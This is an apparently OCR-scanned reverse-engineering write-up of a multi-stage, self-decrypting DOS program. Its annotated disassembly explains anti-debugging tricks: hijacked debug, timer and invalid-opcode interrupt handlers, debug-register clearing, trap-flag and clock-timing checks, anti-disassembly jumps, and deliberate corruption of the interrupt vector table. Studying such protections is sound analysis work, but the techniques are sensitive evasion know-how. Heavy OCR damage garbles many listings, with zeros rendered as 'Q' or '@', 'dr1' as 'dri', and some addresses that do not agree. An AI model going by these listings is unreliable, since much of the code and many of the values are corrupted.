0000: 06b3 6a00 push @ ; stack = 00 00 

0000: 06b5 1f pop ds ; ds = 0000; stack = <empty> 
0000: 06b6 e80000 call Qx6b9 ; stack = b9 06 

0000: 06b9 58 pop ax 7 ax = 6b9 

0000: 06ba @55500 add ax, @x55 7; ax = 70e 


;; These two lines write ax and cs to the offset and segment fields of the 
;; Interrupt Vector Table INT1. INT1 is the interrupt that handles debugging. 
;; This will cause code at cs:070e to be executed when a breakpoint hits 


0000: 06bd a30400 mov word [4], ax 

0000: 06c0 8c0e0600 mov word [6], cs 

0000: 06c4 Oe push cs ; Set ds = cs and es = cs 
0000:06c5 1f pop ds ; (restore es and ds values 
0000:06c6 Qe push cs ; for self modifying code) 
Q000:06c7 Q7 pop es H 


The push 0; pop ds pair sets the data segment pointer to zero. In most CPUs, at addresses close to zero there are a 
lot of important values. In x86, it is where the Interrupt Vector Table (IVT) resides. The IVT contains 4 byte 
segment:offset pointers to subsequent interrupt service routines. Addresses 0000:0004 and 0000:0006 contain the 
vector for Interrupt 1, “Debug Exceptions”. This service routine is executed whenever a breakpoint is hit. The 
debugger installs it’s own service routine there (that is, writes the segment and offset to it) to take action when a 
debug breakpoint is hit. In this stage, the program becomes more defensive about being dynamically analyzed by 
hijacking the debugger’s interrupt vector to it’s own code. 


INT1 is one of the two debug interrupts for x86. There are two interrupts for flexibility, and for things like debugging 
the debuggers. The simpler debug interrupt is INT3, which is made special by allocating a one byte opcode Oxcc 
reserved for it (it’s the INT 3 opcode). This allows you to place that opcode anywhere in the memory, and because 
it’s only one byte, it will never cause a page fault. Software debuggers use it when you place a breakpoint. The other 
interrupt is INT1 which is for hardware debugging. INT1 is called by hardware when one of the addresses saved in 


4 debug registers (dr0 to dr3) matches the breakpoint conditions set in dr7. This is what lower level debuggers use. 
On DOS, the program has full hardware access so debuggers can use either or both mechanisms. 


Nowadays user-level debuggers use INT3 because it’s available from userspace - it causes a SIGTRAP on unix 
systems, and calls the debug handler on NT (whatever that means, | could not find a definite answer). Hardware 
debug is reserved for the kernel and ring 0 code. 


This is the new debug interrupt handler at 70e that is registered by the code at 6db: 


0000:070e 6650 push eax 
0000:0710 6633c0 xor eax, eax 
0000:0713 Qf23f8 mov dr7, eax 
0000:0716 QF23c0 mov drQ@, eax 
0000:0719 Qf23c8 mov dri, eax 
0000:071c QF23d0 mov dr2, eax 
0000:071f Qf23d8 mov dr3, eax 
0000:0722 6658 pop eax 
0000:0724 cf iret 


It zeroes out all relevant debug registers, which effectively disables all breakpoints and returns to the code. This 
interesting 

anti-reversing technique impacts dynamic analysis by preventing any (Software) debugger from tracing the code, as 
the breakpoints set will not hit unless the breakpoint handler is re-registerd by the debugger. 


Stage ‘ // 


Stage 3 starts with more stack operations. It saves all general purpose registers with pushaw, as well as ds and es 
segments. It then sets ds to 0000. 


; Int 1 at 7@e is still active - trap frag is set 
; —~- stage 3 entry point 


*kKK 000020749 fa cli ; Disable external interrupts 
0000:074a 60 pushaw ; stack = 00 @1 00 Q1 bpL bpH spL spH ... 
Q000:074b le push ds ; stack = 00 01 00 01 00 01 bpL bpH ... 
Q000:074c 06 push es ; stack = 00 01 00 01 00 01 QQ O01 bpL... 
0000:074d 6a00 push @ ; stack = 00 00 00 01 00 01 00 01 00... 
0000:074f 1f pop ds ; ds = 0000; stack = 00 01 00 01 00 01... 


Then, the trap flag is set. At the same time there is an anti disassembly trap set up. The jmp 0x747 skips one byte, 
so the instructions are offset. Most disassemblers will choke on this. | had to move the cursor in radare2 to 0x747 so 
that it disassembled the instructions correctly. Once you get past this trick, the code is revealed to check if TF (trap 
flag) was unset and “adjusts” the stack pointer by 0x100. This way the program will soon crash if you were 
examining this part in a debugger and disabled the trap flag. 


Q000:0750 9c pushf 

7; stack = flL flH Q@ 01 00 01 Q@ Q1 00 01 bpL bpH spL spH 0 @O0 dl dh ?? ch 00 00 
Q000:0751 58 pop ax ; ax = flags ; stack = 0@ 01 00 01 00 01.. 
0000:0752 #7d0 not ax ; ax = flags# 

Q000:0754 ebQ@1 jmp @x757 


;; This is not a jump to next instruction (ebQ0), 

;; it skips one byte (eb01)! These instructions do not make sense. 
0000:0756 9a25000103 lcall @x301:0x25 ; Decoy - not a real insn 
Q000:075b eQal loopne O0x6fe ; Decoys 


0000:075d 2000 and byte [bx + si], al ; Decoys 


;; This is what the disassembler produces when 
3; started at the correct address (Q0x747) 
Q000:0757 250001 and ax, 0x100 5 ax = 0x100 if TF=0, 0x0 if TF=1 
Q000:075a Q3e0 add sp, ax ; Roll stack back 0x100 if trap flag 
; was unset at 750 


Next up the code saves the value of interrupt 8 handler. The old interrupt vector is saved at si+0x490 and si+0x492, 
which is an area at the very end of loaded COM file (the file ends at Oxbed). Bytes Oxbf2-Oxbfd contain zeros, they 
are reserved for storing stuff. 


;; Save INT8’s segment:offset address at si+@x49@ and si+0x492 (@xbf2:Qxbf4) 


Q000:075c a12000 mov ax, word [0x20] ; Load offset address 
0000: 075f e80000 call 0x762 

0000:0762 5e pop si 7 Si = 0x762 

0000:0763 2e89849004 mov word cs:[si + @x490], ax ; Save offset address 
Q000:0768 a12200 mov ax, word [0x22] ; Load segment address 
Q000:076b 2e89849204 mov word cs:[si + @x492], ax ; Save segment address 


Then it redefines the PIT’s interrupt handler to be at cs:07e4 


0000:0770 8bc6 mov ax, Si 5 ax t= Si 

0000:0772 50 push ax ; stack = 62 07 0@ 01... 
0000:0773 058200 add ax, @x82 5 ax = 7e4 

Q000:0776 a32000 mov word [@x20], ax or 

Q000:0779 8c0e2200 mov word [@x22], cs ; Set cs:@7e4 as INT8 


Interrupt 8 is reserved for “Double Fault” in the CPU (a handler for servicing a fault inside an exception handler). 
However due to IBM PC’s engineering team oversight, some ofthe first 0x1f interrupts were assigned to outside of 
the CPU itself. INT8 on the PC is the Programmable Interval Timer interrupt. We will come back to what the handler 
does in a moment. For now let’s just continue with our analysis. 


The program loads two words from IO port 0x40, which is PIT’s timer value (it increases as the timer counts). These 
two words are set as the segment:offset of interrupt 7’s address. Interrupt 7 is “Coprocessor Not Available” and is 
triggered when a coprocessor instruction is executed but there is no coprocessor. On IBM PC, the coprocessor is 
an x87 floating point unit. The x87 is included on die in all x86 CPUs after 386. The code sets these (random) values 
as the interrupt handler, then executes an FPU NOP. If the FPU is not available, it will trigger the interrupt and crash 
the system. Why it’s doing this is unknown to me. Maybe it’s to prevent running the program on FPU-less machines. 
It might also be an anti-virtualization measure, to catch some simple hypervisors of the era that did not emulate 
(restore/save) the FPU (and the FPU not available flag was set). 


Either way, this part of the code prevents running the program on FPU-less machines. 


;; Check for FPU, crash if its not there. 


0000:077d e540 in ax, 0x40 ; Load timer count 
0000:077f a31c00 mov word [@x1c], ax ; Set offset 
0000:0782 e540 in ax, 0x40 

0000:0784 a31e00 mov word [@xle], ax ; Set segment 
Q000:0787 d9da fnop ; Trigger fault 


When the FPU check passes, the code redefines the invalid instruction interrupt, Interrupt 6 “Invalid Opcode”: 


0000:0789 58 pop ax ; Pop saved ax = 0x762 
0000:078a 50 push ax ; Push it back 
Q000:078b 05d400 add ax, @xd4 7; ax = Qx836 


Q000:078e a31800 mov word [0x18], ax 


Q000:0791 8c0e1a00 mov word [@x1al, cs ; Set INT6 to cs:0836 


The code at cs:0836 will be called whenever the processor attempts to execute an invalid instruction. On this error, 
the processor will push eflags, cs and ip to the stack and execute the handler. Let’s take a look at what the new 
handler is: 


;; INT6 handler set at cs:0791 
7; stack words = ip cs flags 


0000: 0836 QF23d0 mov dr2, eax ; Overwrite breakpoint 2 
0000:0839 55 push bp ; Save bp 

0000: 083a 8bec mov bp, sp 7 

0000:083c 83460202 add word [bp + 2], 2 ; Add 2 to saved ip 
0000: 0840 5d pop bp ; Restore bp 

0000: 0841 cf iret ; Return from interrupt 


; (pop ip, pop cs, pop flags) 


This handler will simply advance the instruction pointer by two bytes relative to the errorneous instruction, and 
resume the code 
execution. It will also unset the breakpoint address set in dra. 


Continuing our analysis after the invalid opcode interrupt was installed we arrive at some code that clears the trap 
flag: 


0000:0795 9c pushf . 

0000:0796 58 pop ax H bs 

Q000:0797 25fffe and ax, Oxfeff ; Clear trap flag 
0000:079a 50 push ax ce ats 

Q000:079b 9d popf ' 


And then redefines the debug handler again. 


Q000:079c 58 pop ax ; ax = Qx762 
0000:079d Q53701 add ax, 0x137 ; ax = Qx899 
0000:07a0 a30400 mov word [4], ax Cae 

0000:07a3 8c0e0600 mov word [6], cs ; Set cs:0899 as INT1 


As we will see in a moment, the code at 899 is still encrypted, so there is no point trying to understand it. This 
means that hitting any breakpoint here will crash the computer, as the CPU tries to execute encrypted code. (It’s 
hard to say whether it’s the program or the debugger that will crash, since DOS is a single-tasking OS) 


The next part of stage 3 code is perhaps the most interesting. It’s another anti-re technique that makes dynamic 
analysis harder, if not impossible using regular tools. The code calls DOS int 1Ah ah=0x02 to get the RTC time, runs 
a few instructions that have no effect (apart from breaking the dr1 breakpoint) and then then compares the RTC 
time... 


;; Get RTC time and save second count 


0000:07a7 b402 mov ah, 2 fs 
0000:07a9 cdla int @x1la ; INT 1A, AH=0x@2: get RTC time 
0000:07ab 52 push dx ; Push seconds (dh) + DST flag (dl) 


;; Reprogram PIT channel 1 


Q000:07ac b@b6 mov al, Q@xb6 al = @xb6 = 0b10110110 


0000:07ae e643 out 0x43, al ; Set PIT: ch1, acces lo/hi, 
Q000:07b0 bQ02 mov al, 2 ; mode 2, 16b binary mode 

Q000:07b2 e640 out 0x40, al eer 

0000:07b4 e640 out @x40, al ; Set @x0202 as timer @ reload value 


7; The program changes timer 1 mode but writes timer @ value! 


Q000:07b6 QF20cd mov eax, cro Mangle cr@ through dri 


Q000:07b9 Qf23c8 mov dri, eax ; (this does not change crQ) 

0000:07bc @F21cb mov ebx, dri : 

0000: 07bf QF22c3 mov crQ@, ebx : 

;; Get RTC time again and save second count 

Q000:07c2 b402 mov ah, 2 ; 

0000:07c4 cdla int Qxla ; INT 1A, AH=0x02: get RTC time 

0000: 07c6 58 pop ax ; aX = previous sec count (ah), 
; and dst flag (al) 

Q000:07c7 2af4 sub dh, ah ; Subtract old seconds count 


At the end of this code, register dh contains the seconds difference of wall clock time between the execution of 7a9 
and 7c4. lf a debugger halted the program at that time, for example because of a breakpoint set at crO, then the dh 
register will be non zero. 


Then the program executes this loop, which will XOR every third byte in a region with dh value... 


0000:07c9 b98400 mov cx, x84 ; CX = Qx84 
Q000:07cc 33ff xor di, di ; di =Q0 
+> 0000:07ce 3035 xor byte [di], dh ; 0000:0000 “= dh 
: 0000:07d0 83c703 add di, 3 ; di += 3 
‘—— Q000:07d3 e2T9 loop @x7ce ; Loop back 


...but ds is still 0000, and with di initially set to zero, this loop will xor the least significant byte of the addresses in 
the IVT for the first 0x84 interrupts. This will effectively crash the system as some of these interrupts are executed 
even when the system is idle. 


After this anti debugging trap, the code goes on: 


0000:07d5 Qe push cs ; 

0000:07d6 1f pop ds ; ds = cs 

0000:07d7 8bc6 mov ax, Si + ax = Qx762 

0000:07d9 05e000 add ax, Qxe0 + ax = Ox842 

Q000:07dc 89849404 mov word [si + @x494], ax ; QxObf6 = 42, Ox@bf7 = 08 
0000:07e0 fb sti ; Enable ext. interrupts 
Q000:07e1 eb3f jmp @x822 ; Jump to invalid instr. 


It sets ds to cs, which as we’ve seen previously, indicates there will be operations on the code segment in memory. 
The code loads a pointer into a predefined place near the end of code memory, just after the saved interrupt 8 value. 
Then it enables interrupts with sti and jumps to 0x822.. 


0000: 0822 ff invalid 
0000: 0823 ff invalid 
0000: 0824 ebfc jmp 0x822 ; jump back to the invalid instruction 


..which is an undefined instruction (ff). The illegal instruction handler will advance ip by 2, so the next instruction that 
is executed is at 824, which is a jump back to 822. At this point the code will loop indefinitely handling the invalid 
instruction and jumping back to it. 


Or will it? 
We didn’t look at the PIT’s interrupt handler that was set at 779. Let’s see what that part does: 
;; Assuming this will occur while the #UD interrupt is looping, then registers are 


i; like they were at 7el. 
7; Si = 0x762, constant in this fragment 


7; Stage 3 decryption loop 

;; word cs:[si + @x494] is the ciphertext pointer. We are in the interrupt handler. 
5; Stack = 

os -es-— -ds- -di- -si- 

7; ip cs eflags 0100 0100 0100 0100 bp sp 0000 dx cx ax 

33. *--- Top of stack (sp) 


;; load di with ciphertext pointer 
0000:07e4 2e8bbc9404 mov di, word cs:[si + Q@x494] 


;; First run its ax saved at 7cc; di = @x842 


0000:07e9 8bc6 mov ax, Si ; ax = Q0x762 
0000:07eb 05a202 add ax, @x2a2 ; ax = QxaQd4; 
0000:07ee 3bf8 cmp di, ax : 

»--- 0000:07f0 7522 jne 0x814 ; Skip the code if not 

‘--> 0000:0814 Oe push cs ; We know this one, ds = cs 
0000:0815 1f pop ds A ga 
0000:0816 803501 xor byte [di], 1 ; Decrypt ciphertext byte 
0000:0819 ff849404 inc word [si + 0x494] ; Increase the ciphertext ptr 
Q000:081d b@20 mov al, x20 
0000: 081Ff e620 out @x20, al ; Primary PIC command 20, EOI 
0000:0821 cf iret ; Finish “servicing” the ISR 


; Pull ip, cs, eflags. 


;; This code executes after the decryption is done (jne at @x7f@ is not taken) 


0000:07f2 6a00 push @ A Bed 
0000:07f4 1f pop ds ; ds = 0000 
0000:07f5 fa cli ; disable ext. interrupts 
0000:07f6 2e8b849004 mov ax, word cs:[si + @x490] ; si+490 = bf2 
0000:07fb a32000 mov word [@x20], ax are 
0000:07fe 2e8b849204 mov ax, word cs:[si + @x492] ; si+492 = bf4 
;; restore INT8 (PIT) segment:offset from bf2:bf4 
0000: 0803 a32200 mov word [@x22], ax 
0000: 0806 fb sti ; Enable ext. interrupts 
0000: 0807 8bec mov bp, sp ; bp = sp 
0000: 0809 8bc6 mov ax, Si + ax = Qx762 
0000: 2080b @54b01 add ax, @x14b + ax = Qx8ad 
0000: 080e 894600 mov word [bp], ax ; Set top of stack to Qx8ad 
»--- 0000:0811 ebOa jmp @x81d 
: 0000:0813 90 nop 
‘--> Q000:081d b020 mov al, 0x20 ; PIC End Of Interrupt command 
0000: 081f e620 out 0x20, al ae 
0000: 0821 cf iret ; Return from ISR 


7; Pop ip, cs, eflags pushed by the cpu at start of ISR 
;; Execution continues at cs:@8ad 


This is the stage 3 decryption loop. It is surprisingly simple, but the loop that carries it out is concealed. It’s done by 
hooking the programmable timer interrupt. This interrupt handler will execute every time the timer ticks. The interrupt 
handler will load di with the si+0x494 value (ciphertext pointer). Then it compares it with the pointer to the end of 
stage 3 ciphertext (which is at the start of the stage 2 key LUT). If it’s not equal, the ciphertext is not fully decrypted 
and the ISR decrypts the next byte by xoring it with 0x01. The ciphertext pointer is increased and the service routine 
is finished (PIC signalled, iret executed). 


The C code that | used to simulate stage 3 and prepare a memory image of stage 4 code looks like this: 


* ciphertext = memory+0x832; 


do 


*ciphertext “= 0x01; 


ciphertext ++; 


As | said, the complexity lies within the implementation using INT1 and INTS3. 


This loop will decrypt memory from 0x842 to 0xa04. Between the interrupts, the CPU will be busy executing the 
invalid instruction handler caused by invalid instructions at 812. The xor value is 1 because 0x822 is within the area 
being decrypted by this stage. The decrypted value for ff is fe, which also happens to be an invald instruction. This 
way the #UD hanlder will keep looping the CPU even after the bytes at 0x822 is decrypted. 


After the decryption is done, the ciphertext pointer (di) matches the end pointer (ax) and the jump at 7f0 will not be 
taken. The interrupt routine will restore the original timer interrupt routine address, edit the saved ip on the stack to 
point to stage 4 entry point, and then jump there using iret. Stage 4 entry is at cs:08ad. 


Here is the full stage 3 code as decrypted by stage 2. 


stage 


ae | 


; Int 1 at 7@e is still active - trap frag is set 
; —- stage 3 entry point 


, 
’ 
, oe 
, 
’ 
’ 


2k 0000:0749 fa cli ; Disable external interrupts 

0000:074a 60 pushaw 

Q000:074b le push ds 

0000:074c 06 push es 

0000:074d 6a00 push @ 

;; stack = 00 Q@ Q@ 01 00 01 Q@ 01 00 O1 bpL bpH spL spH 00 @O@ dl dh ?? ch 00 00 

0000:074f 1f pop ds ; ds = 0000; 

0000:0750 9c pushf ; stack = fiL flH @@ 01... 

Q000:0751 58 pop ax ; ax = flags ; stack = 00 01 00 Q1.. 

0000:0752 F7d0 not ax ; ax = flags# 

0000:0754 ebd1 jmp 0x757 ; Not a jump to next instruction (ebQ0Q), 

; it skips one byte (ebQ1) instead! 
0000: 0756 9a25000103 Llcall @x30@1:0x25 ; Decoy 
0000:075b eQal loopne Ox6fe 5 oe 
0000:075d 2000 and byte [bx + si], al; 

;; This is what the disassembler produces when started at the correct address (0747) 
Q000:0757 250001 and ax, 0x100 ; ax = 0x100 if TF=0, 0x@ if TF=1 
0000:075a 03e0 add sp, ax ; Roll stack back 0x100 if trap 

; flag was unset at 750 

Q000:075c a12000 mov ax, word [@x20] ; Load offset address 

0000:075f e80000 call @x762 

0000:0762 5e pop si 7; Si = 0x762 

0000:0763 2e89849004 mov word cs:[si + @x490], ax ; Save offset address 


0000:0768 a12200 mov ax, word [0x22] ; Load segment address 


Q000:076b 2e89849204 mov word cs:[si + @x492], ax ; Save segment address 
0000:0770 8bc6 mov ax, Si 5 ax t= Si 

Q000:0772 50 push ax 

0000:0773 058200 add ax, 0x82 5 ax = 7e4 

Q000:0776 a32000 mov word [@x20], ax Brea 

Q000:0779 8c0e2200 mov word [@x22], cs ; Set cs:@7e4 as INT8 
;; Check for FPU, crash if its not there. 

0000:077d e540 in ax, 0x40 ; Load timer count 
0000:077f a31c00 mov word [@x1ic], ax ; Set offset 
Q000:0782 e540 in ax, 0x40 

0000:0784 a31e00 mov word [@x1le]l, ax ; Set segment 
0000:0787 d9da fnop ; Trigger fault 
0000:0789 58 pop ax ; Restore ax = @x762 
0000:078a 50 push ax ; stack = 62 07 00 ... 
Q000:078b 05d400 add ax, @xd4 5 ax = Q0x836 
Q000:078e a31800 mov word [@x18], ax ; 

Q000:0791 8c0e1a00 mov word [@x1al, cs ; Set INT6 to cs:0836 
0000:0795 9c pushf : 

0000:0796 58 pop ax ; 

Q000:0797 25fffe and ax, Oxfeff ; 

0000:079a 50 push ax 4 BP 

Q000:079b 9d popf ; Clear trap flag 
Q000:079c 58 pop ax 7; ax = Qx762, 
0000:079d Q53701 add ax, 0x137 + ax = Qx899 
Q000:07a0 a30400 mov word [4], ax i ia 

0000:07a3 8c0e0600 mov word [6], cs ; Set cs:@899 as INT1 
;; Get RTC time and save second count 

0000:07a7 b402 mov ah, 2 

0000:07a9 cdla int Qxla ; INT 1A, AH=0x02: get RTC time 
0000: 07ab 52 push dx ; Push seconds (dh) + DST flag (dl) 
;; Reprogram PIT channel 1 

Q000:07ac b@b6 mov al, Q@xb6 ; al = @xb6 = 0b10110110 
0000:07ae e643 out @x43, al ; Set PIT: chil, acces lo/hi, 
0000:07b0 bQ02 mov al, 2 ; mode 2, 16b binary mode 
Q000:07b2 e640 out @x40, al Sake 

0000:07b4 e640 out 0x40, al ; Set @x@202 as timer @ reload value 
;; The program changes timer 1 mode but writes timer @ value! 

0000:07b6 OF20c0 mov eax, cra ; Mangle cr®@ through dri 
0000:07b9 QF23c8 mov dri, eax ; (this does not change crQ@) 
Q000:07bc Q@f21cb mov ebx, dri fs 

0000: 07bf Q@F22c3 mov crQ@, ebx . 


;; Get RTC time again and save second count 


Q000:07c2 
0000:07c4 
0000: 07c6 


Q000:07c7 


b402 mov ah, 2 
cdla int Qx1la ; INT 1A, AH=0x02: get RTC time 
58 pop ax } ax = previous second count (ah) 


; and dst flag (al) 
2af4 sub dh, ah ; Subtract old seconds count 


;; Rewriting the IVT. If more than 1 second elapsed between execution of 797 and 7b2, 
;; then dh is non zero and the IVT’s offset low bytes will all be corrupted. 
;; Mind you, ds is still 0000 


0000:07c9 b98400 mov cx, 0x84 5 CX = 0x84 
Q000:07cc 33ff xor di, di ; di = 0 
»-> 0000:07ce 3035 xor byte [di], dh ; 0000:0000 “= dh 
: Q000:07d0 83c703 add di, 3 ; di t= 3 
‘—— Q000:07d3 e2T9 loop @x7be ; Loop 
Q0000:07d5 Oe push cs : 
0000:07d6 1f pop ds ; ds = cs 
Q000:07d7 8bc6 mov ax, Si + ax = Qx762 
Q000:07d9 05e000 add ax, QxeQ 5 ax = Qx842 
Q000:07dc 89849404 mov word [si + @x494], ax ; Save @x842 to cs:0bf6 
0000:07e0 fb sti ; Enable ext. interrupts 
Q000:07e1 eb3f jmp @x822 ; Jump to invalid insns 
Stage / 


The entry point starts at O8ad. The stack state is the same as it was at stage 3 entry point. The first instruction is a 
subroutine call, one of the few call instructions that actually call a function instead of being used for position 
independent code (the previous one was in stage 2). 


0000: 08ad e8caff call @x87a ; Call subroutine at 87a 
0000:087a 6a00 push @ F 

Q000:087c 1f pop ds ; ds = 0000 

0000:087d c536a000 lds si, [0xaQ] 


7; Si = 0000:00a0, ds = 0000:00a2 
; load ds:si with segment:offset from @xaQ, INT28 handler 


DOS Idle Interrupt 


0000: 0881 ad lodsw ax, word [sil] ; ax = ds:si, si += 2 
0000: 0882 3d9cfb cmp ax, Oxfb9c 

0000: 0885 750c jne 0x893 

0000: 0887 ad lodsw ax, word [sil] 

0000: 0888 3d3d55 cmp ax, 0x553d 

0000: 088b 7506 jne 0x893 

0000: 088d ad lodsw ax, word [sil] 

0000: 088e 3d2d75 cmp ax, 0x752d 

0000: 0891 7401 je 0x894 

0000: 0893 c3 ret ; Return from call 
0000: 0894 eaddddt fff ljmp Oxtfff:0 ; Invalid address 


The function loads the address of INT 28h handler into ds:si and then loads and compares three words starting at 
that address. If the words do not match the values compared, the function returns normally. If all three words match, 
then the function executes a long jump into oblivion. 


The comparison values make up a piece of x86 code listed below: 


9c pushf 
fb sti 
3d552d cmp ax, @x2d55 


752? jne ?? 


INT 28h is the DOS idle interrupt. The code that the function compares against looks like valid code for a start of an 
INT service handler. Perhaps it’s installed by some debugger or other tool that this program is supposed to protect 
against? 


After the check function returns, the code restores es, ds and all general purpose registers from stack, then 
immediately saves them back. 


0000: 08b0 07 pop es ; es = 0100 (cs) 
Q000:08b1 1f pop ds ; ds = 0100 (cs) 
0000: 08b2 61 popaw 

0000: 08b3 60 pushaw 

0000: 08b4 le push ds 

0000: 08b5 06 push es 


The register contents at this point are listed below: 


ax = 0000 bx = 0000 CX = Xx?? 
dx = @acl ds = 0100 es = 0100 
di = 0100 si = 0100 bp = sp + 6 


Then the code sets the PIT’s channel 1 reload value to ffff. On older machines PIT channel 1 was used for DRAM 
refresh. 


0000: 08b6 b@b6 mov al, Q@xb6 B 

Q000:08b8 e643 out 0x43, al ; PIT command b6: chil, 
0000:08ba bOf fT mov al, Oxff ; acces lo/hi, mode 2, 16 bit 
0000: 08bc e640 out 0x40, al 

0000: 08be e640 out @x40, al ; Load @xffff to PIT ch 1. 


Next the code checks DOS version, and exits cleanly to dos if it’s below major version 2. 


0000: 08c0 b430 mov ah, 0x30 ; INT 21h, ah=0x30: 

0000: 08c2 cd21 int @x21 ; Get DOS version 

0000: 08c4 3c@2 cmp al, 2 ; Compare maj version with 2 
0000: 08c6 7305 jae @x8cd ; Jump above or equal 
0000:08c8 33c0 xor ax, ax 7 ax = 0 

0000:08ca 06 push es 3eS = cs 

Q000:08cb 50 push ax 

0000: 08cc cb retf ; Pull cs:@000 and jump there 


The exit is done by jumping to cs:0000 which is the very beginning of Program Segment Prefix. To maintain 
compatiability with CP/M, DOS puts an exit vector there (An INT 20h instruction). It’s one of the ways to exit to DOS 


cleanly. 


0000: 08cd b430 mov ah, 0x30 
0000: 08cf cd21 int @x21 ; Get DOS version again 


If DOS’ major is at least 2, the code goes on. INT 21h (ah=0x30) is executed again, but the result is discarded. bp 
and bx are loaded with two pointers from the PSP, and di and cx are loaded with some constants. If you look up the 
ascii values of the constants, di:cx will read “SUCK”. 


7; PSP:@2 segment of first byte beyond memory allocated to program 

0000: 08d1 8b2e0200 mov bp, word [2] ; bp = *(0100:0002) ; 
;7 PSP:2c DOS 2+ environment for process 

0000: 08d5 8b1e2c00 mov bx, word [@x2c] ; bx = *(0100:002c) 


@x5355 “SU” 
@x434b “CK” 


0000: 08d9 bf5553 mov di, @x5355 ; di 
0000: 08dc b94b43 mov cx, @x434b 7 CX 


Does the author tell us to “SUCK” di:cx here? 


Whatever the aim is, DOS version is requested a third time, then compared with 2 again and the result is discarded 
(the jump continues execution the same in either case). Some values are loaded into registers, the constants are 
loaded again. 


0000: O8dFf b430 mov ah, @x30 ; Get DOS version (3rd time) 
0000: 08e1 cd21 int @x21 ; 

0000: 08e3 3c02 cmp al, 2 ; Either case continues 
0000:08e5 7300 jae Q@x8e7 : code execution. 
Q000:08e7 33c0 xor ax, ax 

0000: 208e9 bf0000 mov di, @ 

0000: 08ec 8b00 mov ax, word [bx + sil] 

0000: 08ee 90 nop 

0000: 08ef 2bf7 sub si, di 

0000: 08f1 bf5553 mov di, @x5355 ; SUCK again 

0000: 08f4 b94b43 mov cx, @x434b 


Now the interesting part starts. We have more PIC. First, a pointer to a storage area at the end of the binary is 
calculated, and a value of ffff is loaded there: 


0000: 08f7 e80000 call @x8fa aea 

0000:08fa 5e pop si ; Si = Ox8fa 

0000: 08fb 81c6fee2 add si, @x2fe ; Si = Oxbf8 

0000: O8TFf 2ec704FffftFf mov word cs:[sil, Oxffff ; cs:@bf8 = Oxffff 


Then there is another “call; pop si” sequence and a pointer to the beginning of what stage 3 decrypted is calculated 
in two steps. 


0000: 0904 e80000 call 0x907 


Q000:0907 5e pop si = 0x907 

;; Si = Ox6be now points at start of what stage 1 decrypted (cs has changed) 
0000: 0908 81ee4902 sub si, 0x249 ; Si = @x6be 

0000: 090c le push ds ; Save ds stack = Q1 00... 
0000: 090d 6a00 push @ Fis 

0000: 090F 1f pop ds i ds = 0000 

0000:0910 8bc6 mov ax, Si ax = @x6be 

77 aX = Ox842 points at start of what stage 3 decrypted (cs has changed) 
0000:0912 Q58401 add ax, 0x184 7 ax = 0x842 


Accumulator ax now contains the pointer to the beginning of decrypted stage 4 code. In between the steps, ds is 
zeroed. Then, two interrupt routine handlers are installed: 


0000:0915 a30c00 mov word [@xc], ax 


0000:0918 8c0@e0e0O mov word [@xe], cs  ; Set INT3 to cs:0842 
Q000:091c 8bc6 mov ax, Si ; ax = Qx6be 
0000:091e @56a01 add ax, @xl6a 5 ax = Q@x828 
Q000:0921 a31800 mov word [@x18], ax ; 

0000:0924 8c0e1a00 mov word [@xla], cs ; Set INT6 to cs:0828 


A word at 0000:0270 is set to ea 00 (ea at 270, 00 at 271). Then a pointer is calculated and saved at 271, along with 
the code segment at 273. 


0000:0928 c7067002ea00 mov word [x27], @xea ; Set 0000:0270 to ea 00 
Q000:092e 8bc6 mov ax, Si ; ax = Qx6be 
0000: 0930 Q5f302 add ax, 0x2f3 + ax = Qx9b1 


0000: 0933 a37102 mov word [0x271], ax ; Set Q000:0271 
0000: 0936 8c0e7302 mov word [0x273], cs 7 Set 0000: 0273 


ax 
cs 


If you noticed that this together forms the long jump instruction with immediate operand (opcode ea), then you are 
right, because that’s exactly what it is, as | will show in a moment. On my test DOS 6.22 VM, the area at 0000:0270 
points to an unused interrupt. (The segment:offset pointers all point to an iret). 


The code then saves the current si, and loads the current ip into si again, then calculates a pointer. The pointer is left 
in si. 


0000:093a 56 push si ; stack = be 06 
0000: 093b e80000 call @x93e . 

0000:093e 5e pop si ; Si = Qx93e 

0000: 093f 56 push si ; stack = 3e 09 be 06 
0000: 0940 83c61d add si, @x1d > Si = @x95b 
0000:0943 90 nop 


Then the program does a very interesting trick: 


0000:0944 66b84de80T 00 mov eax, @xfe84d f 

0000:094a QF23c0 mov dr@, eax ; Set @xfe84d as breakpoint 0 
0000: 094d 666803000000 mov eax, 3 4 

0000:0953 OFf23f8 mov dr7, eax ; Set breakpoint @ conditions 
0000:0956 eadde800TO Ljmp @xf000:0xe84d ; Jump to lin. address = @00f e84d 


First, a constant value is loaded into dr0. Then, dr7, which is the control register for the debug core, enables this 
breakpoint to trigger on instruction execution. Finally, a long jump is executed to the address that was just set as the 
breakpoint address. This, of course, triggers the debug interrupt handler. 


| have to point out that this looked fairly obvious. Due to how segmented memory works, there is a lot of 
segment:offset combinations that point to the same linear address, so a jump to ex. fd73:111d would also trigger 
the breakpoint, while being a bit more covert about it. 


The long jump at 956 triggers the debug interrupt, INT1 handler, and the execution continues inside it at 899. INT1 
was Set in the previous stage at 7a0. The code is now decrypted and makes sense: 


;; INT1 handler. ISR stack words are = ip cs flags 


0000: 0899 8bec mov bp, sp ; bp = sp 

0000: 089b 897600 mov word [bp], si ; Set return ip to si 

0000: 2089e 8c4e02 mov word [bp + 2], cs ; Set return segment to cs 
0000: 08a1 6633c0 xor eax, eax ; Clear eax 

0000: 08a4 QOF23F8 mov dr7, eax ; Clear all bp conditions 
0000: 08a7 QF23c0 mov drQ@, eax ; Clear drQ 

0000: 08aa cf iret ; Continue execution at cs:si 


The handler clears the interrupt, then resumes execution to cs:si by manipulating the return address on it’s stack. 
the Source Index register (si) was set to 0x95b by code at 940, so that is where the execution will continue. It is also 
the immediately next instruction after that long jump. Let’s follow the code. 


;; stack grew by 4 bytes: 3e 09 be 06 


0000: 095b 5e pop si ; Si = Qx03e 

Q000:095c 81c66df fF add si, 0xff6d ; Si = @x@8ab (overflow) 
0000: 0960 6a00 push @ ; 

0000:0962 1f pop ds ; 

0000: 0963 89360400 mov word [4], si | 


Q000:0967 8c0e0600 mov word [6], cs Set INT 1 handler to cs:@8ab 


Register si is again used to calculate a code pointer and set it as an interrupt handler (this has been a pattern, 
obviously). Next up we have some more register shuffling: 


Q000:096b 5e pop si ; Si = @x6be 
0000:096c 1f pop ds ; ds = 0x0100 

0000: 096d 8cd8 mov ax, ds ; ax = 0x0100 

0000: 096f 051000 add ax, 0x10 ; ax = 0x0110 
0000:0972 8ed8 mov ds, ax ; ds = 0x0110 
0000:0974 le push ds : 

